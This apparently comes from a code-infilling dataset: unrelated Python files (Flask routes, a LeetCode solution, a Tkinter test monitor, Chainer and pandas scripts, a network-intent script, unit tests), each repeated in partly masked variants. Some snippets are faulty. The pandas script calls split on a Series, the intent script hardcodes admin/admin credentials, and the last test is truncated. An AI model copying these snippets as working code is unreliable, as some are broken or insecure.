return render_template('reset_request.html', title = 'Rest Password', form = form)
@app.route('/reset_password/<token>',methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid / expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method = 'sha256') # sha256 will generate a hash which is 80 chars long
user.password = hashed_password
db.session.commit()
flash('Your password has been updated!', 'success')
# send congrat email for registering
# msg = Message(subject = 'Welcome {}'.format(form.username.data), sender = app.config.get("MAIL_USERNAME"), recipients = [str(form.email.data)], body = 'Congratulations you have signed up and your account has been created!')
# mail.send(msg)
return redirect(url_for('login'))
return render_template('reset_token.html', title = 'Rest Password', form = form)
@app.route('/predict_model', methods=['GET', 'POST'])
def predict_model():
int_features = [int(x) for x in request.form.values()]
final_features = [np.array(int_features)]
prediction = model.predict(final_features)
output = round(prediction[0], 2)
map_dict = {1 : 'DT Toronto', 3 : 'North York', 4 : 'Scarborough', 6 : 'Etobicoke'}
output = map_dict[output]
return render_template('model_page.html', prediction_text = 'The Crime Occurred in : {}'.format(output))
if __name__ == "__main__":
if ENV == 'prod':
app.run()
else:
app.run(debug=True)
| [
25,
26,
28,
36,
39
] |
1,664 | 3edfc1098c775fa31456aa3cc938051b2dbb8697 | <mask token>
| <mask token>
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
<mask token>
| <mask token>
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
print(Solution().findSubsequences([4, 6, 7, 7]))
| from typing import List
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
print(Solution().findSubsequences([4, 6, 7, 7]))
| null | [
0,
2,
3,
4
] |
1,665 | 572d58eec652207e6ec5a5e1d4c2f4310f2a70f3 | import ttk
import Tkinter as tk
from rwb.runner.log import RobotLogTree, RobotLogMessages
from rwb.lib import AbstractRwbGui
from rwb.widgets import Statusbar
from rwb.runner.listener import RemoteRobotListener
NAME = "monitor"
HELP_URL="https://github.com/boakley/robotframework-workbench/wiki/rwb.monitor-User-Guide"
DEFAULT_SETTINGS = {
NAME: {
"port": 8910,
"host": "localhost",
}
}
class MonitorApp(AbstractRwbGui):
def __init__(self):
AbstractRwbGui.__init__(self, NAME, DEFAULT_SETTINGS)
self.wm_geometry("900x500")
port = self.get_setting("monitor.port")
print "using port", port
self.listener = RemoteRobotListener(self, port=port, callback=self._listen)
self.wm_title("rwb.monitor port: %s" % self.listener.port)
self._create_menubar()
self._create_statusbar()
self._create_notebook()
self.stack = []
self.event_id = 0
# self.status_label.configure(text="port: %s" % self.listener.port)
def _create_menubar(self):
self.menubar = tk.Menu(self)
self.configure(menu=self.menubar)
self.file_menu = tk.Menu(self.menubar, tearoff=False)
self.file_menu.add_command(label="Exit", command=self._on_exit)
self.help_menu = tk.Menu(self, tearoff=False)
self.help_menu.add_command(label="View help on the web", command=self._on_view_help)
self.help_menu.add_separator()
self.help_menu.add_command(label="About the robotframework workbench", command=self._on_about)
self.menubar.add_cascade(menu=self.file_menu, label="File", underline=0)
self.menubar.add_cascade(menu=self.help_menu, label="Help", underline=0)
def _on_view_help(self):
import webbrowser
webbrowser.open(HELP_URL)
def _on_exit(self):
self.destroy()
def _create_statusbar(self):
self.statusbar = Statusbar(self)
self.statusbar.pack(side="bottom", fill="x")
self.statusbar.add_section("port",12, "port %s" % self.listener.port)
self.statusbar.add_progress(mode="indeterminate")
# grip = ttk.Sizegrip(self.statusbar)
# grip.pack(side="right")
# self.status_label = ttk.Label(self.statusbar, text="", anchor="w")
# self.status_label.pack(side="left", fill="both", expand="true", padx=8)
# self.statusbar.pack(side="bottom", fill="x")
def _create_notebook(self):
self.notebook = ttk.Notebook(self)
self.notebook.pack(side="top", fill="both", expand=True)
self.log_tree = RobotLogTree(self.notebook, auto_open=("failed","suite","test","keyword"))
self.log_messages = RobotLogMessages(self.notebook)
self.notebook.add(self.log_tree, text="Details")
self.notebook.add(self.log_messages, text="Messages")
self.notebook.pack(side="top", fill="both", expand=True)
self.listeners = (self.log_tree, self.log_messages)
def _listen(self, cmd, *args):
self.event_id += 1
for listener in self.listeners:
listener.listen(self.event_id, cmd, args)
if cmd in ("start_test", "start_suite", "start_keyword"):
name = args[0]
cmd_type = cmd.split("_")[1]
self.stack.append((cmd_type, name))
self.update_display()
elif cmd in ("end_test", "end_suite", "end_keyword"):
cmd_type = cmd.split("_")[1]
self.stack.pop()
self.update_display()
def update_display(self):
if len(self.stack) == 1:
self.statusbar.progress_start()
elif len(self.stack) == 0:
self.statusbar.progress_stop()
s = ".".join([x[1] for x in self.stack]).strip()
self.statusbar.message(s, clear=True, lifespan=0)
if __name__ == "__main__":
app = MonitorApp()
app.mainloop()
| null | null | null | null | [
0
] |
1,666 | 670efbd9879099b24a87e19a531c4e3bbce094c6 | <mask token>
|
"""
Read all the images from a directory,
resize, rescale and rename them.
"""
| null | null | null | [
0,
1
] |
1,667 | d0e5a3a6db0e27ecf157294850a48a19750a5ac2 | <mask token>
class Session:
<mask token>
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| <mask token>
class Session:
USER_ROOT_ID = 'x-root-id'
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| class Cookies:
<mask token>
class Session:
USER_ROOT_ID = 'x-root-id'
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| class Cookies:
USER_TOKEN = 'utoken'
class Session:
USER_ROOT_ID = 'x-root-id'
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| # Cookies Keys
class Cookies:
USER_TOKEN = "utoken"
# Session Keys
class Session:
USER_ROOT_ID = "x-root-id"
class APIStatisticsCollection:
API_ACTION = "x-stats-api-action"
DICT_PARAMS = "x-stats-param-dict"
DICT_RESPONSE = "x-stats-resp-dict"
SUCCESS = "x-stats-success"
COLLECT = "x-stats-collect"
# Param Dict Prefix
class ParamDictPrefix:
PostKey = "x-" # Used in http POST params from HTML forms
| [
3,
4,
5,
6,
7
] |
1,668 | 8dfd92ab0ce0e71b41ce94bd8fcf057c8995a2a4 | <mask token>
| <mask token>
def plot3D(xValues, labels, figure=0):
minClass = min(labels)
numberOfClasses = int(max(labels) - minClass)
fig = plt.figure(figure)
ax = plt.axes(projection='3d')
colors = ['r', 'b', 'y', 'c', 'm']
for i in range(numberOfClasses + 1):
classLocation = np.argwhere(labels == i + minClass)
ax.scatter3D(xValues[classLocation, 0], xValues[classLocation, 1],
xValues[classLocation, 2])
| import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
def plot3D(xValues, labels, figure=0):
minClass = min(labels)
numberOfClasses = int(max(labels) - minClass)
fig = plt.figure(figure)
ax = plt.axes(projection='3d')
colors = ['r', 'b', 'y', 'c', 'm']
for i in range(numberOfClasses + 1):
classLocation = np.argwhere(labels == i + minClass)
ax.scatter3D(xValues[classLocation, 0], xValues[classLocation, 1],
xValues[classLocation, 2])
| import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
def plot3D(xValues, labels, figure = 0):
minClass = min(labels)
numberOfClasses = int(max(labels) - minClass)
fig = plt.figure(figure)
ax = plt.axes(projection='3d')
colors = ["r", "b", "y", "c", "m"]
for i in range(numberOfClasses+1):
classLocation = np.argwhere(labels == i+minClass)
ax.scatter3D(xValues[classLocation, 0], xValues[classLocation, 1], xValues[classLocation, 2]) #3D
| null | [
0,
1,
2,
3
] |
1,669 | 4480b305a6f71ff64022f2b890998326bf402bf0 | <mask token>
| <mask token>
app = web.application(urls, globals())
| <mask token>
import web
from myapp.urls import urls
app = web.application(urls, globals())
| #coding=utf-8
'初始化Package,加载url,生成app对象'
import web
from myapp.urls import urls
app = web.application(urls, globals())
| null | [
0,
1,
2,
3
] |
1,670 | d44d9003e9b86722a0fc1dfe958de462db9cd5f1 | <mask token>
| <mask token>
print('TRIANGULO: {:.3f}'.format(t))
<mask token>
print('CIRCULO: {:.3f}'.format(pi * c ** 2))
print('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))
print('QUADRADO: {:.3f}'.format(b ** 2))
print('RETANGULO: {:.3f}'.format(a * b))
| linha = input().split()
a = float(linha[0])
b = float(linha[1])
c = float(linha[2])
t = a * c / 2
print('TRIANGULO: {:.3f}'.format(t))
pi = 3.14159
print('CIRCULO: {:.3f}'.format(pi * c ** 2))
print('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))
print('QUADRADO: {:.3f}'.format(b ** 2))
print('RETANGULO: {:.3f}'.format(a * b))
| linha = input().split()
a = float(linha[0])
b = float(linha[1])
c = float(linha[2])
t = (a*c)/2
print('TRIANGULO: {:.3f}'.format(t))
pi = 3.14159
print("CIRCULO: {:.3f}".format(pi*c**2))
print('TRAPEZIO: {:.3f}'.format( ((a+b)*c)/2 ))
print("QUADRADO: {:.3f}".format(b**2))
print("RETANGULO: {:.3f}".format(a*b)) | null | [
0,
1,
2,
3
] |
1,671 | 474700968e563d34d6a0296ec62950e2e71fe1b0 | <mask token>
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
<mask token>
<mask token>
| <mask token>
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
<mask token>
| <mask token>
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
| import chainer.links as L
import chainer.functions as F
from chainer import optimizer, optimizers, training, iterators
from chainer.training import extensions
from chainer.datasets import tuple_dataset
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
| # -*- coding: utf-8 -*-
import chainer.links as L
import chainer.functions as F
from chainer import optimizer, optimizers, training, iterators
from chainer.training import extensions
from chainer.datasets import tuple_dataset
class SoftMaxTrainer():
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == "Adam":
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],
'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],
'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',
'main/accuracy', 'validation/main/accuracy',
'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
| [
4,
5,
6,
7,
8
] |
1,672 | fc17b865815a7a5ec51f477a9fdda54667686eed | import pandas as pd
import matplotlib.pyplot as plt
loansData = pd.read_csv('loansData.csv')
# Print the first 5 rows of each of the column to see what needs to be cleaned
print loansData['Interest.Rate'][0:5]
print loansData['Loan.Length'][0:5]
print loansData['FICO.Range'][0:5]
# Clean up the columns
loansData['Interest.Rate'] = loansData['Interest.Rate'].map(
lambda x: x.rstrip('%'))
loansData['Loan.Length'] = loansData['Loan.Length'].map(
lambda x: x.rstrip('months'))
# Print again to see if cleaning took place or not
print loansData['Interest.Rate'][0:5]
print loansData['Loan.Length'][0:5]
'''
convert the data in FICO Range into string and
split the string and take the lowest value.
'''
loansData['FICO.Score'] = loansData['FICO.Range'].astype(str)
print loansData['FICO.Score'][0:5]
loansData['FICO.Score'] = loansData['FICO.Score'].split()
print loansData['FICO.Score'][0:5]
loans_list = loansData['FICO.Score'].tolist()
FICO = []
for array in range(len(loans_list)):
loan = loans_list[array].split("-") # Split each sub-array on '-'
FICO.append(int(loan[0]))
loansData['FICO.Score'] = FICO
# Plot histogram
plt.figure()
p = loansData['FICO.Score'].hist()
plt.show()
# Create a scatterplot matrix
a = pd.scatter_matrix(loansData, alpha=0.05, figure=(10, 10))
plt.show()
a = pd.scatter_matrix(loansData, alpha=0.05, figure=(10, 10), diagonal='hist')
plt.show()
| null | null | null | null | [
0
] |
1,673 | 955017ad7cc9dde744b8d8a9439f63f4725d50bc | #!/usr/bin/python
# This script deletes and recreates the NIC BoD intents.
# Use nic-bod-setup.py to set up the physical network and NEMO nodes first
import requests,json
import argparse, sys
from requests.auth import HTTPBasicAuth
USERNAME='admin'
PASSWORD='admin'
NIC_INTENTS="http://%s:8181/restconf/config/intent:intents"
NIC_INTENT="http://%s:8181/restconf/config/intent:intents/intent/14ce424a-3e50-4a2a-ad5c-b29845158c8b"
def delete_nic_intents(contHost):
delete(NIC_INTENTS % contHost)
def create_nic_intent(contHost):
data = {
"intent": {
"id": "14ce424a-3e50-4a2a-ad5c-b29845158c8b",
"actions": [
{
"order": 1,
"allow": {}
}
],
"subjects": [
{
"order": 1 ,
"end-point-group": { "name": "dmz" }
}, {
"order": 2 ,
"end-point-group": { "name": "interior" }
}
],
"constraints": [
{
"order": 1,
"bandwidth-constraint": { "bandwidth": "10G" }
}
],
"conditions": [
{
"order": 1,
"daily": { "start-time": "08:00:00Z", "duration": "10h" }
}
]
}
}
put(NIC_INTENT % contHost, data)
def post(url, data):
headers = {'Content-type': 'application/yang.data+json',
'Accept': 'application/yang.data+json'}
print "POST %s" % url
print json.dumps(data, indent=4, sort_keys=True)
r = requests.post(url, data=json.dumps(data), headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
print r.text
r.raise_for_status()
def put(url, data):
headers = {'Content-type': 'application/yang.data+json',
'Accept': 'application/yang.data+json'}
print "PUT %s" % url
print json.dumps(data, indent=4, sort_keys=True)
r = requests.put(url, data=json.dumps(data), headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
print r.text
r.raise_for_status()
def delete(url):
headers = {'Content-type': 'application/yang.data+json',
'Accept': 'application/yang.data+json'}
print "DELETE %s" % url
r = requests.delete(url, headers=headers, auth=HTTPBasicAuth(USERNAME, PASSWORD))
print r.text
r.raise_for_status()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--controller', default='127.0.0.1', help='controller IP')
args=parser.parse_args()
delete_nic_intents(args.controller)
create_nic_intent(args.controller)
| null | null | null | null | [
0
] |
1,674 | ab632c3c8a7f295a890de19af82fde87c6d600bc | <mask token>
| class Solution(object):
<mask token>
| class Solution(object):
def gcdOfStrings(self, str1, str2):
if str1 == str2:
return str1
elif not str1 or not str2:
return ''
elif str1.startswith(str2):
return self.gcdOfStrings(str1[len(str2):], str2)
elif str2.startswith(str1):
return self.gcdOfStrings(str1, str2[len(str1):])
else:
return ''
| null | null | [
0,
1,
2
] |
1,675 | 71fb9dc9f9ac8b1cdbc6af8a859dbc211512b4d1 | <mask token>
class ImageClassifierMockup(ImageClassifier):
<mask token>
<mask token>
| <mask token>
class ImageClassifierMockup(ImageClassifier):
<mask token>
def classify_image(self, image):
return {'final_class': 'dog', 'final_prob': 0.8}
| <mask token>
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog', 'final_prob': 0.8}
| from allcode.controllers.image_classifiers.image_classifier import ImageClassifier
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog', 'final_prob': 0.8}
| from allcode.controllers.image_classifiers.image_classifier import ImageClassifier
class ImageClassifierMockup(ImageClassifier):
def classify_images(self, images):
pass
def classify_image(self, image):
return {'final_class': 'dog',
'final_prob': .8}
| [
1,
2,
3,
4,
5
] |
1,676 | 9cea27abebda10deefa9e05ddefa72c893b1eb18 | import numpy as np
import cv2
from DataTypes import FishPosition
class FishSensor(object):
def __init__(self):
self.cap = cv2.VideoCapture(0)
self.cap.set(3, 280)
self.cap.set(4, 192)
#cv2.namedWindow("image")
#lower_b, lower_g, lower_r = 0, 0, 80
lower_b, lower_g, lower_r = 0, 55, 130
#upper_b, upper_g, upper_r = 130, 75, 115
upper_b, upper_g, upper_r = 100, 145, 195
self.lower = np.array([lower_b, lower_g, lower_r], dtype='uint8')
self.upper = np.array([upper_b, upper_g, upper_r], dtype='uint8')
self.old_x, self.old_y = 0.0, 0.0
self.old_count = 0
def poll(self):
ret, frame = self.cap.read()
mask = cv2.inRange(frame, self.lower, self.upper)
idx_rows, idx_cols = np.where(mask)
if len(idx_rows > 0):
row = int(round(idx_rows.mean()))
col = int(round(idx_cols.mean()))
marked_frame = cv2.circle(frame, (col, row), 5, (0, 0, 255), -1)
x = float(col)/(280/2)-1.0
y = float(row)/(192/2)-1.0
self.old_x = x
self.old_y = y
self.old_count = 0
else:
if self.old_count > 5:
x = 0.0
y = 0.0
else:
x = self.old_x
y = self.old_y
self.old_count += 1
#cv2.imshow("image", frame)
#key = cv2.waitKey(1)
return FishPosition(x=x, y=y)
if __name__ == "__main__":
cap = cv2.VideoCapture(0)
cap.set(3, 280)
cap.set(4, 192)
def onClick(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
print x, y, frame[y, x]
cv2.namedWindow("image")
cv2.setMouseCallback("image", onClick)
#lower_b, lower_g, lower_r = 0, 0, 80
lower_b, lower_g, lower_r = 0, 55, 130
#upper_b, upper_g, upper_r = 130, 75, 115
upper_b, upper_g, upper_r = 100, 145, 195
mode = 0
while True:
ret, frame = cap.read()
lower = np.array([lower_b, lower_g, lower_r], dtype='uint8')
upper = np.array([upper_b, upper_g, upper_r], dtype='uint8')
mask = cv2.inRange(frame, lower, upper)
idx_rows, idx_cols = np.where(mask)
if len(idx_rows > 0):
row = int(round(idx_rows.mean()))
col = int(round(idx_cols.mean()))
marked_frame = cv2.circle(frame, (col, row), 5, (0, 0, 255), -1)
print "%.3f, %.3f" % (float(col) / (280.0/2) - 1,
float(row) / (192.0/2) - 1)
#cv2.imshow("image", marked_frame)
else:
pass
#cv2.imshow("image", frame)
if mode:
output = cv2.bitwise_and(frame, frame, mask=mask)
cv2.imshow("image", output)
else:
cv2.imshow("image", frame)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
if key & 0xFF == ord('w'):
lower_b += 5
if key & 0xFF == ord('s'):
lower_b -= 5
if key & 0xFF == ord('e'):
lower_g += 5
if key & 0xFF == ord('d'):
lower_g -= 5
if key & 0xFF == ord('r'):
lower_r += 5
if key & 0xFF == ord('f'):
lower_r -= 5
if key & 0xFF == ord('t'):
upper_b += 5
if key & 0xFF == ord('g'):
upper_b -= 5
if key & 0xFF == ord('y'):
upper_g += 5
if key & 0xFF == ord('h'):
upper_g -= 5
if key & 0xFF == ord('u'):
upper_r += 5
if key & 0xFF == ord('j'):
upper_r -= 5
if key & 0xFF == ord('m'):
mode = 1 if mode == 0 else 0
if ord('a') <= (key & 0xFF) <= ord('z'):
print (lower_b, lower_g, lower_r), (upper_b, upper_g, upper_r)
cap.release()
cv2.destroyAllWindows()
| null | null | null | null | [
0
] |
1,677 | eda1c1db5371f5171f0e1929e98d09e10fdcef24 | <mask token>
class TestAssert(unittest.TestCase):
<mask token>
<mask token>
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
asserts.top_percentile(sample, 12)
with self.assertRaises(Exception):
asserts.top_percentile(sample, 11)
| <mask token>
class TestAssert(unittest.TestCase):
<mask token>
def setUp(self):
Measurement.csv_storage = self.TEST_CSV_STORAGE
self.addCleanup(Measurement.clear_database)
def test_consumption_below(self):
sample = create_random_sample(10, 1)
asserts.consumption_below(sample, 11)
with self.assertRaises(Exception):
asserts.consumption_below(sample, 9)
def test_consumption_lower_than_app(self):
sample_low_energy = create_random_sample(9, 1, app_pkg='com.sample',
use_case='login')
sample_high_energy = create_random_sample(12, 1, app_pkg=
'com.sample', use_case='login')
existing_sample_one = create_random_sample(10, 1, app_pkg=
'com.persisted', use_case='login')
existing_sample_two = create_random_sample(11, 1, app_pkg=
'com.persisted', use_case='logout')
for measurement in (existing_sample_one + existing_sample_two):
measurement.persist()
asserts.consumption_lower_than_app(sample_low_energy, 'com.persisted')
asserts.consumption_lower_than_app(sample_low_energy,
'com.persisted', 'login')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted')
with self.assertRaises(Exception):
asserts.consumption_lower_than_app(sample_high_energy,
'com.persisted', 'login')
def test_top_percentile(self):
sample = create_random_sample(11, 1, app_pkg='com.sample', use_case
='login')
for i in range(100):
existing_sample = create_random_sample(i, 1, app_pkg=
'com.persisted.{}'.format(i), use_case='login')
for measurement in existing_sample:
measurement.persist()
